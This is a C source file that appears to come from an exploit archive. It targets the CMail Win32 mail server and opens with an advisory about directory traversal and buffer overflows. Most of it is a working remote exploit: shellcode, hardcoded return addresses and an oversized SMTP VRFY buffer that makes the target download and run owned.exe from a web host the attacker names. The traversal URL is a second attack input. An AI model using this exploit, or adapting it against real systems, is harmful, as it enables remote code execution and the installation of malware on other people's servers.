270 lines
No EOL
6.9 KiB
C
270 lines
No EOL
6.9 KiB
C
/*
|
|
source: https://www.securityfocus.com/bid/281/info
|
|
|
|
A vulnerability in Computalynx's CMail allows remote malicious users to steal local files.
|
|
|
|
Compulynx's CMail is a Win32 mail server program. One of its features is allowing users to access their email with a web browser via a built-in web server.
|
|
|
|
The web server fails to check whether requested files fall outside its document tree (by using ".." in the URL). Thus attackers can retrieve files in the same drives as that on which the software resides if they know or can get it's filename.
|
|
|
|
A number of buffer overflows in the processing of SMTP and POP commands also exist.
|
|
|
|
http://www.example.com:8002/../spool/username/mail.txt
|
|
|
|
the buffer overflow vulnerability
|
|
*/
|
|
|
|
#define UNIX
|
|
|
|
#ifndef UNIX
|
|
#include <stdio.h>
|
|
#include <fcntl.h>
|
|
#include <winsock.h>
|
|
#include <io.h>
|
|
#define CLOSE _close
|
|
#define SLEEP Sleep
|
|
|
|
#else
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <fcntl.h>
|
|
#include <netdb.h>
|
|
#include <netinet/in.h>
|
|
#include <sys/socket.h>
|
|
#include <arpa/inet.h>
|
|
#define CLOSE close
|
|
#define SLEEP sleep
|
|
#endif
|
|
|
|
/*
|
|
CMail Exploit by _mcp_ <pw@nacs.net>
|
|
Sp3 return address and win32 porting by acpizer <acpizer@unseen.org>
|
|
*/
|
|
|
|
|
|
const unsigned long OFFSET = 635;
|
|
const unsigned long LENGTH = 650;
|
|
const unsigned long CODEOFFSET = 11;
|
|
|
|
char code[] =
|
|
"\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
|
|
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
|
|
"\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x5B\xC1\xE3\x10\x66\xBB"
|
|
"\x18\x79\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46"
|
|
"\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x5B\xC1\xE3"
|
|
"\x10\x66\xBB\x44\x79\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66"
|
|
"\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33"
|
|
"\xC9\x51\x51\x51\x51\x51\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51"
|
|
"\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6"
|
|
"\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF"
|
|
"\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57"
|
|
"\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1"
|
|
"\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66"
|
|
"\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D"
|
|
"\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46"
|
|
"\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F"
|
|
"\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
|
|
"\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66"
|
|
"\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53"
|
|
"\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30"
|
|
"\x30\x00";
|
|
|
|
/*This is the encrypted /~pw/owned.exe we paste at the end */
|
|
char dir[] =
|
|
"\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1";
|
|
|
|
/*
|
|
|
|
Below is:
|
|
|
|
add ecx, 10
|
|
jmp ecx
|
|
|
|
We use this to transfer to our code that we store before the return address on
|
|
our overflow buffer, We have to do this because there isn't near enough room
|
|
behind the return address to include the code. If we weren't lucky enough to have
|
|
a register pointing virtually right to our code we could include a routine that
|
|
searches memory for specific dword in a specific direction relative to a
|
|
register's value then transfers control to our code located there. The code can
|
|
also be easyly snuck in on another buffer by doing this.
|
|
|
|
*/
|
|
|
|
|
|
char controlcode[] =
|
|
"\x83\xc1\x0A\xFF\xE1";
|
|
|
|
|
|
|
|
unsigned int getip(char *hostname)
|
|
{
|
|
struct hostent *hostinfo;
|
|
unsigned int binip;
|
|
|
|
hostinfo = gethostbyname(hostname);
|
|
|
|
if(!hostinfo)
|
|
{
|
|
printf("cant find: %s\n",hostname);
|
|
exit(0);
|
|
}
|
|
#ifndef UNIX
|
|
memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length);
|
|
#else
|
|
bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length);
|
|
#endif
|
|
return(binip);
|
|
}
|
|
|
|
|
|
int usages(char *fname)
|
|
{
|
|
printf("Remote Buffer Overflow exploit v1.2 by _mcp_ <pw@nacs.net>.\n");
|
|
printf("Win32 Porting and nt sp3 address By Acpizer <acpizer@unseen.org>\n");
|
|
printf("Usages: \n");
|
|
printf("%s <target host> <www site> <return address>\n", fname);
|
|
printf("win98:\n");
|
|
printf(" <return address> = 0xBFF79243\n");
|
|
printf("NT SP3:\n");
|
|
printf(" <return address> = 0x77E53FC7\n");
|
|
printf("NT SP4:\n");
|
|
printf(" <return address> = 0x77E9A3A4\n");
|
|
printf("Will make <target host> running CSMMail download, save, and\n");
|
|
printf("execute http://<www site>/~pw/owned.exe\n");
|
|
|
|
exit(0);
|
|
|
|
}
|
|
|
|
|
|
main (int argc, char *argv[])
|
|
{
|
|
int sock,targethost,sinlen;
|
|
struct sockaddr_in sin;
|
|
static unsigned char buffer[20000];
|
|
unsigned char *ptr,*ptr2;
|
|
unsigned long ret_addr;
|
|
int len,x = 1;
|
|
unsigned long rw_mem;
|
|
|
|
|
|
#ifndef UNIX
|
|
WORD wVersionRequested;
|
|
WSADATA wsaData;
|
|
int err;
|
|
|
|
wVersionRequested = MAKEWORD( 2, 2 );
|
|
err = WSAStartup( wVersionRequested, &wsaData );
|
|
if (err != 0) exit(1);
|
|
#endif
|
|
if (argc < 4) usages(argv[0]);
|
|
|
|
|
|
targethost = getip(argv[1]);
|
|
|
|
|
|
len = strlen(argv[2]);
|
|
if (len > 60)
|
|
{
|
|
printf("Bad http format!\n");
|
|
usages(argv[0]);
|
|
}
|
|
|
|
ptr = argv[2];
|
|
while (x <= len)
|
|
{
|
|
x++;
|
|
(*ptr)++; /*Encrypt the http ip for later parsing */
|
|
ptr++;
|
|
}
|
|
|
|
if( (sscanf(argv[3],"0x%x",(unsigned long *) &ret_addr)) == 0)
|
|
{
|
|
printf("Input error, the return address has incorrect format\n");
|
|
exit(0);
|
|
}
|
|
|
|
|
|
sock = socket(AF_INET,SOCK_STREAM,0);
|
|
|
|
sin.sin_family = AF_INET;
|
|
sin.sin_addr.s_addr = targethost;
|
|
sin.sin_port = htons(25);
|
|
sinlen = sizeof(sin);
|
|
|
|
|
|
printf("Starting to create the egg\n");
|
|
ptr = (char *)&buffer;
|
|
strcpy(ptr,"VRFY ");
|
|
ptr+=5;
|
|
|
|
memset((void *)ptr, 0x90, 7000);
|
|
ptr2=ptr;
|
|
|
|
ptr2+=OFFSET;
|
|
memcpy ((void *) ptr2,(void *)&ret_addr, 4);
|
|
ptr2+=8;
|
|
/* Put the code on the stack that transfers control to our code */
|
|
memcpy((void *) ptr2, (void *)&controlcode, (sizeof(controlcode)-1) );
|
|
|
|
ptr2=ptr;
|
|
ptr2+=LENGTH;
|
|
(*ptr2)=0x00;
|
|
|
|
|
|
ptr+=CODEOFFSET;
|
|
memcpy((void *) ptr,(void *)&code,strlen(code));
|
|
|
|
|
|
(char *) ptr2 = strstr(ptr,"\xb1");
|
|
if (ptr2 == NULL)
|
|
{
|
|
printf("Bad shell code\n");
|
|
exit(0);
|
|
}
|
|
ptr2++;
|
|
(*ptr2)+= len + ( sizeof(dir) );
|
|
|
|
(char *) ptr2 = strstr(ptr,"\x83\xc6");
|
|
if (ptr2 == NULL)
|
|
{
|
|
printf("Bad shell code\n");
|
|
exit(0);
|
|
|
|
}
|
|
|
|
ptr2+= 2;
|
|
|
|
(*ptr2)+= len + 8;
|
|
|
|
ptr+=strlen(code);
|
|
memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http
|
|
site's info */
|
|
ptr+=len;
|
|
memcpy((void *) ptr,(void*) &dir, (sizeof(dir)-1) );
|
|
|
|
printf("Made the egg\n");
|
|
|
|
if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
|
|
{
|
|
perror("error:");
|
|
exit(0);
|
|
}
|
|
printf("Connected.\n");
|
|
|
|
#ifndef UNIX
|
|
send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
|
|
send(sock,"\r\n",2,0);
|
|
#else
|
|
write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char
|
|
*)&buffer */
|
|
write(sock,"\r\n",2);
|
|
#endif
|
|
SLEEP(1);
|
|
printf("Sent the egg\n");
|
|
#ifndef UNIX
|
|
WSACleanup();
|
|
#endif
|
|
CLOSE(sock);
|
|
exit(1);
|
|
} |